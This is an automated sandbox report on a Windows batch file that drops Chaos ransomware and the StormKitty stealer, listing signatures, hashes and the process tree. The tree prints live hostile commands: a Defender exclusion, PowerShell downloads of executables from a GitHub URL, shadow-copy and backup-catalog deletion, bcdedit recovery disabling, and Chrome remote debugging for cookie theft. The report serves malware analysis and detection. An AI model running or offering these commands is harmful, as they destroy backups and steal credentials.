Resubmissions

24/03/2025, 04:06

250324-epe7aswwaz 10

17/03/2025, 21:48

250317-1nzp7syxd1 10

Analysis

  • max time kernel
    109s
  • max time network
    117s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250313-en
  • resource tags

    arch:x64, arch:x86, image:win11-20250313-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    24/03/2025, 04:06

General

  • Target

    fix (4).bat

  • Size

    2KB

  • MD5

    160b408ccc1bd513057cba516f4436e7

  • SHA1

    0deecfee13ebc656eecc6aaab2a8978bc93268d0

  • SHA256

    50c4082ed4c65e96649e53ba20fec89ead550d4774901dcccaf562db79a9e3e4

  • SHA512

    74777e896abd4ca6f4282a1dff09c133f95ecd17f1bb48140fce2f2cca615e5be034950cdf8d3ad3846338f442c8e326fac69ef1b18104bd344e7cd33bdec933

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Uses browser remote debugging 2 TTPs 5 IoCs

    Can be used to control the browser and steal sensitive information such as credentials and session cookies.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Uses the powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 5 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fix (4).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4876
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:668
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
        PID:232
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Hide Artifacts: Ignore Process Interrupts
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3396
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
      2⤵
      • Blocklisted process makes network request
      • Downloads MZ/PE file
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
      2⤵
      • Blocklisted process makes network request
      • Downloads MZ/PE file
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2844
    • C:\Users\Admin\AppData\Local\Temp\build.exe
      "C:\Users\Admin\AppData\Local\Temp\build.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2944
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Drops desktop.ini file(s)
        • Sets desktop wallpaper using registry
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2036
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
          4⤵
          PID:3924
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:1920
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3980
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
          4⤵
          PID:2692
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} bootstatuspolicy ignoreallfailures
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3460
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} recoveryenabled no
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:5080
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
          4⤵
          PID:3876
          • C:\Windows\system32\wbadmin.exe
            wbadmin delete catalog -quiet
            5⤵
            • Deletes backup catalog
            PID:1032
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
          4⤵
          • Opens file in notepad (likely ransom note)
          PID:2736
    • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
      "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:4880
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Wi-Fi Discovery
        • Suspicious use of WriteProcessMemory
        PID:4576
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2476
        • C:\Windows\SysWOW64\netsh.exe
          netsh wlan show profile
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:3252
        • C:\Windows\SysWOW64\findstr.exe
          findstr All
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3428
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1008
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4784
        • C:\Windows\SysWOW64\netsh.exe
          netsh wlan show networks mode=bssid
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:5108
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Drops file in Windows directory
        • Enumerates system info in registry
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe30fbdcf8,0x7ffe30fbdd04,0x7ffe30fbdd10
          4⤵
          PID:1772
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1448,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2152 /prefetch:11
          4⤵
          PID:4752
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2172,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2168 /prefetch:2
          4⤵
          PID:2520
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2304,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2328 /prefetch:13
          4⤵
          PID:2860
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3292,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3340 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:928
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3360 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:5036
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4300 /prefetch:9
          4⤵
          • Uses browser remote debugging
          PID:2604
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4772,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4756 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:2448
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4892,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4928 /prefetch:14
          4⤵
          PID:3020
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5032,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5044 /prefetch:14
          4⤵
          PID:1452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
      2⤵
      • Hide Artifacts: Ignore Process Interrupts
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1660
  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
    1⤵
    PID:3876
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2168
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4296
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
    PID:3528
  • C:\Windows\System32\vds.exe
    C:\Windows\System32\vds.exe
    1⤵
    • Checks SCSI registry key(s)
    PID:5096
  • C:\Windows\system32\BackgroundTransferHost.exe
    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
    1⤵
    • Modifies registry class
    PID:2132

Network

MITRE ATT&CK Enterprise v15

Downloads

                          • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

                            Filesize

                            1B

                            MD5

                            d1457b72c3fb323a2671125aef3eab5d

                            SHA1

                            5bab61eb53176449e25c2c82f172b82cb13ffb9d

                            SHA256

                            8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

                            SHA512

                            ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                            Filesize

                            40B

                            MD5

                            1d6d1e773c2cb63516dc875f48b6b40c

                            SHA1

                            80bcca5dd15ffceb74ffe8b17a31e5d46da41473

                            SHA256

                            2e7ec8cb08e6856724817c7e0a64c9f38118ceb1c4c79f751ac31640a9e230d1

                            SHA512

                            becd167da74904fbdf8540b4d3782bc20c4f8551afa7c6261d1a8fff797bb160a5e3334bef30dc79a4d5416700055623e3f279e8b4c4bc4c0041bc49d16cb119

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

                            Filesize

                            87B

                            MD5

                            e4a639b9d8bf7a90cc97bb4e05a36753

                            SHA1

                            676facdabf06e5f014e95218bfc02b8c18c39284

                            SHA256

                            79da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd

                            SHA512

                            4a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                            Filesize

                            2B

                            MD5

                            d751713988987e9331980363e24189ce

                            SHA1

                            97d170e1550eee4afc0af065b78cda302a97674c

                            SHA256

                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                            SHA512

                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log

                            Filesize

                            3KB

                            MD5

                            662e55efd63947ac1ed9ab166fde4448

                            SHA1

                            ffdefed29e194510e0c86cb9063c2b6bf4b87223

                            SHA256

                            45e102a0dd571dc77afbf39c16f4007c44d643c58168b299f3a69a4769fb3793

                            SHA512

                            60b54ae86eb59911b0c2bd5f2420961fceaac2e3140039c9139c65902dfbf63eb8f19dec2ac4674d6c6b3dd2b4082e461bc53556912f7eb8f634d66c17cc0d1a

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                            Filesize

                            289B

                            MD5

                            541c42f1c98b3e1b011d22eba854e707

                            SHA1

                            db30188de1f22e3077e7044be1386a5d0ecaed9d

                            SHA256

                            0768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b

                            SHA512

                            47828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                            Filesize

                            17KB

                            MD5

                            4786cf24e3e07c212272a4c2c0aa6aad

                            SHA1

                            6948ce944e1dde09aafee35b61b7fee15537a785

                            SHA256

                            01637344a86333f59012fe115b1be0a8366587e176809918a2723a6878a23cdc

                            SHA512

                            6434ad876770eb4bb9e91c4ebb206c41f3b4d0d715ec363c8669d4b595fdd740ac3004855d482c71588f1f7bd4762d427974a4fce31dc50ad633d84d4f132654

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

                            Filesize

                            1KB

                            MD5

                            56220f7b661c85b776763c1a0f189326

                            SHA1

                            64e8d4898867dafa9de8b87862808a1ac05a1239

                            SHA256

                            6371d04275f796eebfdf9ab3c879f32a58af4cb04001598b8d109836b864b872

                            SHA512

                            3071338a1f5c80016f409105efd2367baa4f3742bdaaf41a97794f66670f246ff24f3c11c2fc26e5d33c17f33c3d19a2301fcf4be8ca239f0a903c3b8a2892db

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                            Filesize

                            80KB

                            MD5

                            38e61cfd456cf804da8e5d148eacf796

                            SHA1

                            0350a98c12d3b1996feca7f0c52be22dcb6079b3

                            SHA256

                            0f9fbf41d1153581a399ba5a5b1a3b785a4351161d6d650d19165a43f64185d8

                            SHA512

                            96ac64dc5a0b4e9e4b5314d83a21ab725ed64d45579875bf8f4a62401d13c598b9f6535b431f55198983830daa750467153643a0140e15d9ec4377db043c5eae

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

                            Filesize

                            226B

                            MD5

                            4ae344179932dc8e2c6fe2079f9753ef

                            SHA1

                            60eacc624412b1f34809780769e3b212f138ea9c

                            SHA256

                            3063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4

                            SHA512

                            fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                            Filesize

                            2KB

                            MD5

                            627073ee3ca9676911bee35548eff2b8

                            SHA1

                            4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                            SHA256

                            85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                            SHA512

                            3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            944B

                            MD5

                            05b3cd21c1ec02f04caba773186ee8d0

                            SHA1

                            39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

                            SHA256

                            911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

                            SHA512

                            e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            318b7468f95ad6548bb6b631a14863dd

                            SHA1

                            77e835ce5092cf8d6b04dbb42a2f4c66e63a1557

                            SHA256

                            dd795b9f7d426c42a8f35cda8e2223c41a5b41560cff651ae2ec89f9aeb16555

                            SHA512

                            0fe428f2607bceae4bd947417aa68dcff8eaf3bc328c88904fd0cc6a1b2e1ec9eda7fb216783476b811ea0a12199fea54751c9ba5e4d746c7c6f0a9a888ef76f

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            dd3474e6a72c08266c25f196f78b13fd

                            SHA1

                            b70c6bbd7794b49b6b9afa6343987a7f553d1268

                            SHA256

                            82acd1c6613bb2c907a26be1f61f6556ee03cabf1aa73dad27d012be88e05318

                            SHA512

                            cf5138ab09f19034fa5d058819956fd0556c56d674268e496dbaded228839d2be576bd74cda26127adf03cce9a8ab485ce6a07c7332a2c65a77ca9b56d92c79d

                          • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\267aad0b-2fdd-4292-8bff-59b3a5d8a384.down_data

                            Filesize

                            555KB

                            MD5

                            5683c0028832cae4ef93ca39c8ac5029

                            SHA1

                            248755e4e1db552e0b6f8651b04ca6d1b31a86fb

                            SHA256

                            855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

                            SHA512

                            aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147.zip

                            Filesize

                            407KB

                            MD5

                            b077dab664a004215814a4391b6dde66

                            SHA1

                            c3c2f1138317225ae98f616b080370cefa082c18

                            SHA256

                            726afcaa627b24e176cec78f636df4a66847f0716ea0e1161745d0c5616b5bae

                            SHA512

                            2927dd7361048783dba4324def7859b72b415045272278064dbfb024251b22e899e7b4f603f2b59d312855a9674c6ad2d2068eee7811e7079bc00a91fc5cc247

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeAutoFill.txt

                            Filesize

                            23B

                            MD5

                            f19d961388cd1c4572942a4f1397d15d

                            SHA1

                            95a89992f4fe50c0a6f4351c3f93c14487087844

                            SHA256

                            052caba139f51903bc4994a3cace4e65c87fd093b6efec8141e4a6c4625e380d

                            SHA512

                            66a82f3216189a50df4ca19194a1eda2989e6635fc115508d9c0b2a33b3345f657a17214c52ed78999eb8a3e571199e70c3ae4854deaa7eb1f380af7f6f8fb09

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeBookmarks.txt

                            Filesize

                            19B

                            MD5

                            c5b94f01b5b97e31f9cec28fecefe0b1

                            SHA1

                            5a2f650235d6319696f02a10a0393b47dbddcd81

                            SHA256

                            bf9eec15e97a4addb7f3b9a15f2de3b5499428750e3ecf1cbad5e3bad5e00548

                            SHA512

                            8e6a75963a9e613ee3a5fe4032c42898904426c19541ec54404811482ef8aac4f84ff23bd80d72f0d33215dcde7d008fcd4687c79ba35cac5b4240c5ad5b109b

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeCookies.txt

                            Filesize

                            17B

                            MD5

                            964d5571d9a4fec576fe454162f2e844

                            SHA1

                            6234d1102a5012094dc8818bc045f7890d270905

                            SHA256

                            6cfad5b342f80a79633747ee591775dbf46be34fbc793930e5de9aab7afb9995

                            SHA512

                            402b81b47e62fa0d2b993eb01df725d1f3ec826ed76c0ac17d5ebaed048e6c7556ac2e1b3c0141e2347386cb5c7c74377c37f990ba9b5745f388181153b8a46c

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeHistory.txt

                            Filesize

                            17B

                            MD5

                            b80546283f231ee762dee4b33b0aa091

                            SHA1

                            ec5a0f5581d8d9e9784f82b77e4e0eb187d78301

                            SHA256

                            188352fe4a40938e0918eed1c4b0ae7266fb13c9de77330e04f192711d15c6f8

                            SHA512

                            df1519614443b80b22a601ca4f1b4119eeaef0715fe913dd327a7c247986cba16cbbd7f55e32ea0557b5e5338897c0f82ac23e91d69836ad280c7f587d863d51

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgePasswords.txt

                            Filesize

                            19B

                            MD5

                            c4efd9a7b61ebf43b608440be5e33369

                            SHA1

                            926418256c277f1b11b575ec6e92ce6a844612f7

                            SHA256

                            ed4280859199da5a8f25c0c6d533d0873460ac63368c14a69bbd863ea4bfb30f

                            SHA512

                            9ea97363868d61d3d51bd3804d638b71ba8dc65260800b3a54051b4725cf08e9d9880a12422a549d94a339c7267e858a7ff5ca9428d64051657134b5c6c20745

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

                            Filesize

                            81B

                            MD5

                            ea511fc534efd031f852fcf490b76104

                            SHA1

                            573e5fa397bc953df5422abbeb1a52bf94f7cf00

                            SHA256

                            e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

                            SHA512

                            f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\DesktopScreenshot.png

                            Filesize

                            407KB

                            MD5

                            3625ed17a6255827969ad5a404f0e41e

                            SHA1

                            87922c687d7c31aef6b20da03c4621b03a617028

                            SHA256

                            c7fcc119a5fcf6b96a186e837887c22c2d1b59de5fb3c263911843f9cc6b9be3

                            SHA512

                            4bd2de013dad5a094a3a28fe171fc0ebe97dfcda5413fc3d0d1f0aced57cc892d0a0835708e42cae720c71befa02604590638cc9ba2f4b260abf14b5d67bfc16

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Info.txt

                            Filesize

                            354B

                            MD5

                            20a03bf7481ae6484d0623abb566212c

                            SHA1

                            08e6067ea2ec07126473066a53855d1f743718bd

                            SHA256

                            44cdd1e35dba8a35672a3f58067b50932f4088298f5e1ecf9a448b3e73380ee7

                            SHA512

                            e3d12f0c103268ae5030345e38c49daa90f6e41c9d9b6294fe97fa0e0032c732682f6e27356ffbbf1611c3e8482dfccefc0859444d054fcbc3c826d649b8dd34

